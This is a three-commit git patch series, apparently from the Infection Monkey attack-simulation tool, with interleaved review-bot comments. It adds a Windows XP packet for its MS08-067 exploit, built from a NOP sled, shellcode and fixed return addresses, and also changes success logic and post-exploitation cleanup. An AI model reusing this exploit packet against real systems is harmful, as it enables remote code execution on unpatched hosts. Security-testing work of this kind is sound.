From 731239f08df424395d4b56165b868e425ab34812 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Fri, 28 Aug 2020 09:38:01 +0300
Subject: [PATCH 1/3] Added windows XP support for win_ms08_067.py and fixed exploited/not exploited logic
---
 .../infection_monkey/exploit/win_ms08_067.py | 28 +++++++++++++++++--
 1 file changed, 25 insertions(+), 3 deletions(-)
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
index d2ad58349..7e26198c6 100644
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
 SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
+XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
+ "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
+ "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
+ "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
+ "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
+ "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
+ "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
+ "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
+ "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
+ "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
+
 # Payload for Windows 2000 target
 PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
 PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
@@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
 class WindowsVersion(IntEnum):
 Windows2000 = 1
 Windows2003_SP2 = 2
+ WindowsXP = 3
 class SRVSVC_Exploit(object):
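Review bot: XP_PACKET is a fixed blob with no comment saying what it is or which XP build it was captured from, while the existing payloads are labelled (`# Payload for Windows 2000 target`); the two four-byte values after `\x08\x04\x02\x00` (`\xc2\x17\x89\x6f`, `\x07\xf8\x88\x6f`) look like build-specific addresses, so on a different build the request would presumably crash the target's Server service instead of running SHELLCODE. Add a comment above the assignment such as `# Pre-built MS08-067 request for Windows XP with SHELLCODE spliced in; the addresses after \x08\x04\x02\x00 are build-specific — record the SP/locale this was verified against`. Unlike the 2000/2003 path, nothing in this packet is derived from the target at runtime, so a mismatch is only discovered when the target crashes.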
@@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
 self._port = port
 self._target = target_addr
 self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
+ self.os_version = os_version
 def get_telnet_port(self):
 """get_telnet_port()
@@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
 return sock
 def _build_dce_packet(self):
+ if self.os_version == WindowsVersion.WindowsXP:
+ return XP_PACKET
 # Constructing Malicious Packet
 dce_packet = '\x01\x00\x00\x00'
 dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
@@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
 _TARGET_OS_TYPE = ['windows']
 _EXPLOITED_SERVICE = 'Microsoft Server Service'
 _windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
- 'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2}
+ 'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
+ 'Windows 5.1': WindowsVersion.WindowsXP}
 def __init__(self, host):
 super(Ms08_067_Exploiter, self).__init__(host)
@@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
 break
 if not remote_full_path:
- return False
+ return True
 # execute the remote dropper in case the path isn't final
 if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
@@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
 sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
 except Exception as exc:
 LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
- return False
+ return True
 finally:
 try:
 sock.close()
From 33b9dae2139131f186474bad870c0e0ab33f5d97 Mon Sep 17 00:00:00 2001
From: Shay Nehmad
Date: Tue, 1 Sep 2020 14:46:53 +0300
Subject: [PATCH 2/3] Bugfix - missing import
---
 monkey/infection_monkey/post_breach/actions/hide_files.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
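Review bot: `self.os_version = os_version` breaks the naming used on the lines just above it, where every other attribute set in this constructor is private (`self._port`, `self._target`, `self._payload`); use `self._os_version = os_version` and read `self._os_version` in `_build_dce_packet`. With XP selected, `self._payload` is still assigned `PAYLOAD_2003`, which the XP path (as far as this diff shows) never reads, so a short comment on that line, e.g. `# unused for XP: _build_dce_packet returns XP_PACKET whole`, would save the next reader from chasing it. The constructor starts outside this hunk.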
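Review bot: the new key `'Windows 5.1'` matches every XP service pack and locale, whereas the two 2003 entries pin a build number and service pack; XP_PACKET in this same commit carries fixed addresses that presumably only hold for one XP build, so on any other build the request most likely crashes the target's Server service (a hard DoS on a production host) rather than yielding a shell. Narrow the key to the exact version string the packet was tested against, in the same form as the 2003 entries, and record that build next to it, e.g. `# XP_PACKET addresses verified only against this SP/locale`. How `_windows_versions` is matched against the host's reported OS string is outside this hunk, so the exact key format has to be checked there.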
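Review bot: `return True` when `remote_full_path` is empty now reports the host as exploited although the dropper was never staged; that matches the commit title only if callers treat the return as "shellcode ran" rather than "monkey propagated", and nothing in the hunk records the distinction for whoever reads the telemetry. Add a log line before the return, e.g. `LOG.warning("Exploited %r but could not upload the dropper; reporting exploited without propagation", self.host)`. The enclosing method begins and ends outside this hunk, so where its return value ends up could not be confirmed here.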
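Review bot: the `except Exception` path now returns True, but the statement it guards is the `net user %s /delete` cleanup, so the account the exploit created may be left behind on the victim; a leftover local user is a security-relevant side effect and deserves more than `LOG.debug`. Change the line to `LOG.warning("Post-exploitation cleanup failed on %r, user %s may remain: %s", self.host, self._config.user_to_add, exc)`. The `try:` this handler belongs to starts outside the hunk, so the exception may also originate earlier in that block; the warning is still warranted, since removal of the user is unconfirmed either way.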
diff --git a/monkey/infection_monkey/post_breach/actions/hide_files.py b/monkey/infection_monkey/post_breach/actions/hide_files.py
index 081a18598..9dfe875eb 100644
--- a/monkey/infection_monkey/post_breach/actions/hide_files.py
+++ b/monkey/infection_monkey/post_breach/actions/hide_files.py
@@ -4,8 +4,9 @@ from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
 from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.utils.hidden_files import (cleanup_hidden_files,
 get_commands_to_hide_files,
- get_commands_to_hide_folders,
- get_winAPI_to_hide_files)
+ get_commands_to_hide_folders)
+from infection_monkey.utils.windows.hidden_files import \
+ get_winAPI_to_hide_files
 HIDDEN_FSO_CREATION_COMMANDS = [get_commands_to_hide_files, get_commands_to_hide_folders]
From e9a939e1f081b2ce699b3a330370a0634ad42b11 Mon Sep 17 00:00:00 2001
From: Shay Nehmad
Date: Tue, 1 Sep 2020 15:00:39 +0300
Subject: [PATCH 3/3] fix typo
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
(╯°□°)╯︵ ┻━┻
---
 monkey/monkey_island/cc/services/config.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py
index 02dd91381..10ce690c0 100644
--- a/monkey/monkey_island/cc/services/config.py
+++ b/monkey/monkey_island/cc/services/config.py
@@ -218,7 +218,7 @@ class ConfigService:
 def set_server_ips_in_config(config):
 ips = local_ip_addresses()
 config["internal"]["island_server"]["command_servers"] = \
- ["%s:%d" % (ip, env_singleton.env.get_islaned_port()) for ip in ips]
+ ["%s:%d" % (ip, env_singleton.env.get_island_port()) for ip in ips]
 config["internal"]["island_server"]["current_server"] = "%s:%d" % (ips[0], env_singleton.env.get_island_port())
 @staticmethod
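Review bot: the new `from infection_monkey.utils.windows.hidden_files import get_winAPI_to_hide_files` is an unconditional module-level import in a file that already imports `is_windows_os` to branch on platform; if `utils.windows.hidden_files` pulls in Windows-only modules (`win32api`, `ctypes.windll` or similar) at import time, importing this action on a Linux agent raises ImportError before any platform check runs. Verify that module imports cleanly on Linux, or move the import under `if is_windows_os():` together with every use of `get_winAPI_to_hide_files` in this file. Minor style point: the backslash continuation can be dropped by wrapping the imported name in parentheses, as the import just above it does.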